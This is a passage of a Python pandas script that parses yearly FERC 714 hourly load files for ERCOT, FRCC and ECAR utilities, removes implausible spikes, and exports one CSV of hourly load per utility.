        1994 : pd.read_fwf('%s/ercot/1994/WTU94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1996 : pd.read_fwf('%s/ercot/1996/WTU96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1997 : pd.read_fwf('%s/ercot/1997/WTU97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1998 : (pd.read_excel('%s/ercot/1998/FERC714.xls' % (fulldir), skiprows=3)['WTUC'].loc[2:].astype(int)/1000).values
    }
}
# --- ERCOT post-processing and export -------------------------------------
# PUB (ID 2409): the 1998/1999 series contain spikes above 300 -- zero them
# so they become NaN on export.
for _yr in (1998, 1999):
    ercot[2409][_yr][ercot[2409][_yr] > 300] = 0

# Export one CSV per respondent ID: concatenate the yearly vectors on an
# hourly DatetimeIndex starting Jan 1 of each year, then write ./ercot/<id>.csv.
if not os.path.exists('./ercot'):
    os.mkdir('ercot')
for k in ercot.keys():
    # print() call form works identically on Python 2 and 3 for one argument.
    print(k)
    s = pd.DataFrame(pd.concat([pd.Series(ercot[k][i], index=pd.date_range(start=datetime.date(i, 1, 1), freq='h', periods=len(ercot[k][i]))) for i in ercot[k].keys()]).sort_index(), columns=['load'])
    # Zeros mark missing/clipped data: convert them to NaN.
    s['load'] = s['load'].astype(float).replace(0, np.nan)
    s.to_csv('./ercot/%s.csv' % k)
###### FRCC
# GAIN: 6909
# LAKE: 10623
# FMPA: 6567
# FPC: 6455
# FPL: 6452
# JEA: 9617
# KUA: 10376
# OUC: 14610
# TECO: 18454
# SECI: 21554
# Hourly load series for FRCC reporting utilities, keyed by FERC respondent
# ID, then by year.  Each value is a flat 1-D array of hourly loads.  File
# layouts vary year to year (fixed-width day x 24h tables, space/tab CSVs,
# Excel workbooks), hence the per-file parser arguments below.
frcc = {
    6909 : {  # GAIN (Gainesville)
        1993 : pd.read_fwf('%s/frcc/1993/GAIN93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1994 : pd.read_csv('%s/frcc/1994/GAIN94' % (fulldir), header=None, sep=' ', skipinitialspace=True, skipfooter=2, skiprows=5).iloc[:, 1:].values.ravel(),
        1995 : pd.read_fwf('%s/frcc/1995/GAIN95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1996 : pd.read_csv('%s/frcc/1996/GAIN96' % (fulldir), sep=' ', skipinitialspace=True).iloc[:, 1:].values.ravel(),
        1997 : pd.read_fwf('%s/frcc/1997/GAIN97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1998 : pd.read_csv('%s/frcc/1998/GAIN98' % (fulldir), sep=' ', skipinitialspace=True, skiprows=3, header=None).iloc[:, 1:].values.ravel(),
        1999 : pd.read_fwf('%s/frcc/1999/GAIN99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        2000 : pd.read_fwf('%s/frcc/2000/GAIN00' % (fulldir), header=None).iloc[:, 4:].values.ravel(),
        # 2002/2003 workbooks: first 730 rows (AM/PM half-days -- TODO confirm),
        # hours in columns 8-19.
        2002 : pd.read_excel('%s/frcc/2002/GAIN02' % (fulldir), sheetname=1, skiprows=3, header=None).iloc[:730, 8:20].values.ravel(),
        2003 : pd.read_excel('%s/frcc/2003/GAIN03' % (fulldir), sheetname=2, skiprows=3, header=None).iloc[:730, 8:20].values.ravel(),
        2004 : pd.read_excel('%s/frcc/2004/GAIN04' % (fulldir), sheetname=0, header=None).iloc[:, 8:].values.ravel()
    },
    10623: {  # LAKE (Lakeland)
        1993 : pd.read_fwf('%s/frcc/1993/LAKE93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1994 : pd.read_fwf('%s/frcc/1994/LAKE94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1995 : pd.read_fwf('%s/frcc/1995/LAKE95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1996 : pd.read_fwf('%s/frcc/1996/LAKE96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1997 : pd.read_fwf('%s/frcc/1997/LAKE97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1998 : pd.read_fwf('%s/frcc/1998/LAKE98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1999 : pd.read_fwf('%s/frcc/1999/LAKE99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        2000 : pd.read_fwf('%s/frcc/2000/LAKE00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        2001 : pd.read_fwf('%s/frcc/2001/LAKE01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        2002 : pd.read_fwf('%s/frcc/2002/LAKE02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel()
    },
    6567 : {  # FMPA
        1993 : pd.read_fwf('%s/frcc/1993/FMPA93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1994 : pd.read_fwf('%s/frcc/1994/FMPA94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=5).iloc[:, 1:].values.ravel(),
        1995 : pd.read_fwf('%s/frcc/1995/FMPA95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=5).iloc[:, 1:].values.ravel(),
        1996 : pd.read_fwf('%s/frcc/1996/FMPA96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=5).iloc[:, 1:].values.ravel(),
        1997 : pd.read_fwf('%s/frcc/1997/FMPA97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=5).iloc[:, 1:].values.ravel(),
        1998 : pd.read_fwf('%s/frcc/1998/FMPA98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=5).iloc[:, 1:].values.ravel(),
        1999 : pd.read_fwf('%s/frcc/1999/FMPA99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=6).iloc[:, 1:].values.ravel(),
        2001 : pd.read_csv('%s/frcc/2001/FMPA01' % (fulldir), header=None, sep=' ', skipinitialspace=True, skiprows=6).iloc[:, 2:-1].values.ravel(),
        2002 : pd.read_csv('%s/frcc/2002/FMPA02' % (fulldir), header=None, sep='\t', skipinitialspace=True, skiprows=7).iloc[:, 1:].values.ravel(),
        2003 : pd.read_csv('%s/frcc/2003/FMPA03' % (fulldir), header=None, sep='\t', skipinitialspace=True, skiprows=7).iloc[:, 1:].values.ravel(),
        2004 : pd.read_csv('%s/frcc/2004/FMPA04' % (fulldir), header=None, sep=' ', skipinitialspace=True, skiprows=6, skipfooter=1).iloc[:, 1:].values.ravel()
    },
    6455 : {  # FPC (Florida Power Corp)
        1993 : pd.read_csv('%s/frcc/1993/FPC93' % (fulldir), sep=' ', skipinitialspace=True, header=None)[1].values,
        1994 : pd.read_csv('%s/frcc/1994/FPC94' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, 2:].values.ravel(),
        1995 : pd.read_csv('%s/frcc/1995/FPC95' % (fulldir), engine='python', header=None)[0].values,
        1996 : pd.read_excel('%s/frcc/1996/FPC96' % (fulldir), header=None, skiprows=2, skipfooter=1).iloc[:, 6:].values.ravel(),
        1998 : pd.read_excel('%s/frcc/1998/FPC98' % (fulldir), header=None, skiprows=5).iloc[:, 7:].values.ravel(),
        1999 : pd.read_excel('%s/frcc/1999/FPC99' % (fulldir), header=None, skiprows=4).iloc[:, 7:].values.ravel(),
        2000 : pd.read_excel('%s/frcc/2000/FPC00' % (fulldir), header=None, skiprows=4).iloc[:, 7:].values.ravel(),
        2001 : pd.read_excel('%s/frcc/2001/FPC01' % (fulldir), header=None, skiprows=5).iloc[:, 7:].values.ravel(),
        2002 : pd.read_excel('%s/frcc/2002/FPC02' % (fulldir), header=None, skiprows=4).iloc[:, 7:].values.ravel(),
        2004 : pd.read_excel('%s/frcc/2004/FPC04' % (fulldir), header=None, skiprows=4).iloc[:, 7:].values.ravel()
    },
    6452 : {  # FPL: hand-parsed tab files (quoted numbers with comma separators)
        1993 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/1993/FPL93' % (fulldir), 'r').readlines()]).iloc[:365, :24].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel(),
        1994 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/1994/FPL94' % (fulldir), 'r').readlines()]).iloc[3:, 1:13].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel(),
        1995 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/1995/FPL95' % (fulldir), 'r').readlines()[3:]]).iloc[:730, 1:13].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel(),
        1996 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/1996/FPL96' % (fulldir), 'r').readlines()[4:]]).iloc[:730, 1:13].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel(),
        1997 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/1997/FPL97' % (fulldir), 'r').readlines()[4:]]).iloc[:730, 1:13].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel(),
        1998 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/1998/FPL98' % (fulldir), 'r').readlines()[4:]]).iloc[:730, 1:13].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel(),
        1999 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/1999/FPL99' % (fulldir), 'r').readlines()[4:]]).iloc[:730, 1:13].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel(),
        2000 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/2000/FPL00' % (fulldir), 'r').readlines()[4:]]).iloc[:730, 1:13].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel(),
        2001 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/2001/FPL01' % (fulldir), 'r').readlines()[4:]]).iloc[:730, 1:13].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel(),
        2002 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/2002/FPL02' % (fulldir), 'r').readlines()[4:]]).iloc[:730, 1:13].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel(),
        2003 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/2003/FPL03' % (fulldir), 'r').readlines()[4:]]).iloc[:730, 1:13].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel(),
        2004 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/2004/FPL04' % (fulldir), 'r').readlines()[4:]]).iloc[:730, 1:13].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel()
    },
    9617 : {  # JEA (Jacksonville)
        1993 : pd.read_csv('%s/frcc/1993/JEA93' % (fulldir), sep=' ', skipinitialspace=True, header=None)[2].values,
        1994 : pd.read_csv('%s/frcc/1994/JEA94' % (fulldir), sep=' ', skipinitialspace=True, header=None)[2].values,
        1996 : pd.read_fwf('%s/frcc/1996/JEA96' % (fulldir), header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1997 : pd.read_fwf('%s/frcc/1997/JEA97' % (fulldir), header=None).iloc[:, 1:].values.ravel(),
        1998 : pd.read_csv('%s/frcc/1998/JEA98' % (fulldir), sep='\t', header=None)[2].values,
        1999 : pd.read_csv('%s/frcc/1999/JEA99' % (fulldir), sep='\t', header=None)[2].values,
        2000 : pd.read_excel('%s/frcc/2000/JEA00' % (fulldir), header=None)[2].values,
        2001 : pd.read_excel('%s/frcc/2001/JEA01' % (fulldir), header=None, skiprows=2)[2].values,
        2002 : pd.read_excel('%s/frcc/2002/JEA02' % (fulldir), header=None, skiprows=1)[2].values,
        2003 : pd.read_excel('%s/frcc/2003/JEA03' % (fulldir), header=None, skiprows=1)[2].values,
        2004 : pd.read_excel('%s/frcc/2004/JEA04' % (fulldir), header=None, skiprows=1)[2].values
    },
    10376 : {  # KUA (Kissimmee)
        1994 : pd.read_csv('%s/frcc/1994/KUA94' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, 1:].values.ravel(),
        1995 : pd.read_csv('%s/frcc/1995/KUA95' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, 1:].values.ravel(),
        1997 : pd.read_csv('%s/frcc/1997/KUA97' % (fulldir), sep='\t', skipinitialspace=True, header=None).iloc[:, 2:].values.ravel(),
        2001 : pd.read_csv('%s/frcc/2001/KUA01' % (fulldir), skiprows=1, header=None, sep=' ', skipinitialspace=True).iloc[:, 1:].values.ravel(),
        2002 : pd.read_csv('%s/frcc/2002/KUA02' % (fulldir), skipfooter=1, header=None, sep=' ', skipinitialspace=True).iloc[:, 1:].values.ravel()
    },
    14610 : {  # OUC (Orlando)
        1993 : pd.read_fwf('%s/frcc/1993/OUC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1994 : pd.read_fwf('%s/frcc/1994/OUC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1995 : pd.read_fwf('%s/frcc/1995/OUC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1996 : pd.read_fwf('%s/frcc/1996/OUC96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1997 : pd.read_fwf('%s/frcc/1997/OUC97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1998 : pd.read_fwf('%s/frcc/1998/OUC98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1999 : pd.read_fwf('%s/frcc/1999/OUC99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        2000 : pd.read_fwf('%s/frcc/2000/OUC00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        2001 : pd.read_fwf('%s/frcc/2001/OUC01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=2).iloc[:, 1:].values.ravel(),
        2002 : pd.read_fwf('%s/frcc/2002/OUC02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel()
    },
    18454 : {  # TECO (Tampa Electric)
        1993 : pd.read_fwf('%s/frcc/1993/TECO93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=1).iloc[:, 1:].values.ravel(),
        1994 : pd.read_fwf('%s/frcc/1994/TECO94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=1).iloc[:, 1:].values.ravel(),
        1998 : pd.read_csv('%s/frcc/1998/TECO98' % (fulldir), engine='python', skiprows=3, header=None)[0].values,
        1999 : pd.read_csv('%s/frcc/1999/TECO99' % (fulldir), engine='python', skiprows=3, header=None)[0].values,
        # 2000 file has trailing junk per row: keep only the leading 4 digits.
        2000 : pd.read_csv('%s/frcc/2000/TECO00' % (fulldir), engine='python', skiprows=3, header=None)[0].str[:4].astype(int).values,
        2001 : pd.read_csv('%s/frcc/2001/TECO01' % (fulldir), skiprows=3, header=None)[0].values,
        2002 : pd.read_csv('%s/frcc/2002/TECO02' % (fulldir), sep='\t').loc[:, 'HR1':].values.ravel(),
        2003 : pd.read_csv('%s/frcc/2003/TECO03' % (fulldir), skiprows=2, header=None, sep=' ', skipinitialspace=True).iloc[:, 2:].values.ravel()
    },
    21554 : {  # SECI (Seminole)
        1993 : pd.read_fwf('%s/frcc/1993/SECI93' % (fulldir), header=None, skipfooter=1).iloc[:, 3:].values.ravel(),
        1994 : pd.read_fwf('%s/frcc/1994/SECI94' % (fulldir), header=None, skipfooter=1).iloc[:, 3:].values.ravel(),
        1995 : pd.read_fwf('%s/frcc/1995/SECI95' % (fulldir), header=None, skipfooter=1).iloc[:, 3:].values.ravel(),
        1996 : pd.read_fwf('%s/frcc/1996/SECI96' % (fulldir), header=None, skipfooter=1).iloc[:, 3:].values.ravel(),
        1997 : pd.read_fwf('%s/frcc/1997/SECI97' % (fulldir), header=None, skipfooter=1).iloc[:, 3:].values.ravel(),
        1999 : pd.read_fwf('%s/frcc/1999/SECI99' % (fulldir), header=None, skipfooter=1).iloc[:, 3:].values.ravel(),
        2000 : pd.read_fwf('%s/frcc/2000/SECI00' % (fulldir), header=None, skipfooter=1).iloc[:, 3:].values.ravel(),
        2002 : pd.read_fwf('%s/frcc/2002/SECI02' % (fulldir), header=None).iloc[:, 3:].values.ravel(),
        2004 : pd.read_fwf('%s/frcc/2004/SECI04' % (fulldir), header=None).iloc[:, 3:].values.ravel()
    }
}
# Zero out obviously-bad spikes in a few FRCC series: any hourly reading
# above the per-series sanity cap is treated as a sensor/transcription error.
for _util, _yr, _cap in ((6455, 1995, 10000), (9617, 2002, 10000), (10376, 1995, 300)):
    _arr = frcc[_util][_yr]
    _arr[_arr > _cap] = 0
# Ensure the output directory exists before writing per-utility CSVs.
if not os.path.exists('./frcc'):
    os.mkdir('frcc')
# One CSV per utility code: stitch the yearly hourly arrays into a single
# chronologically-sorted 'load' series, with zeros recoded as missing (NaN).
for _util in frcc.keys():
    print(_util)
    _pieces = []
    for _yr in frcc[_util].keys():
        _vals = frcc[_util][_yr]
        _idx = pd.date_range(start=datetime.date(_yr, 1, 1), freq='h', periods=len(_vals))
        _pieces.append(pd.Series(_vals, index=_idx))
    _out = pd.DataFrame(pd.concat(_pieces).sort_index(), columns=['load'])
    _out['load'] = _out['load'].astype(float).replace(0, np.nan)
    _out.to_csv('./frcc/%s.csv' % _util)
###### ECAR
# AEP: 829
# APS: 538
# AMPO: 40577
# BREC: 1692
# BPI: 7004
# CEI: 3755
# CGE: 3542
# CP: 4254
# DPL: 4922
# DECO: 5109
# DLCO: 5487
# EKPC: 5580
# HEC: 9267
# IPL: 9273
# KUC: 10171
# LGE: 11249
# NIPS: 13756
# OE: 13998
# OVEC: 14015
# PSI: 15470
# SIGE: 17633
# TE: 18997
# WVPA: 40211
# CINRGY: 3260 -> Now part of 3542
# FE: 32208
# MCCP:
ecar = {
829 : {
1993 : pd.read_fwf('%s/ecar/1993/AEP93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/AEP94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/AEP95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/AEP96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/AEP97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/AEP98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/AEP99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/AEP00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/AEP01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/AEP02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/AEP03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/AEP04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
538 : {
1993 : pd.read_fwf('%s/ecar/1993/APS93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/APS94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/APS95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
40577 : {
2001 : pd.read_fwf('%s/ecar/2001/AMPO01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/AMPO02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/AMPO03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/AMPO04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
1692 : {
1993 : pd.read_fwf('%s/ecar/1993/BREC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/BREC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/BREC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/BREC96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/BREC97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/BREC98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/BREC99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/BREC00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/BREC01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/BREC02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/BREC03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/BREC04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
7004 : {
1994 : pd.read_fwf('%s/ecar/1994/BPI94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/BPI99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/BPI00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/BPI01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/BPI02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/BPI03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/BPI04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
3755 : {
1993 : pd.read_fwf('%s/ecar/1993/CEI93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/CEI94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/CEI95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
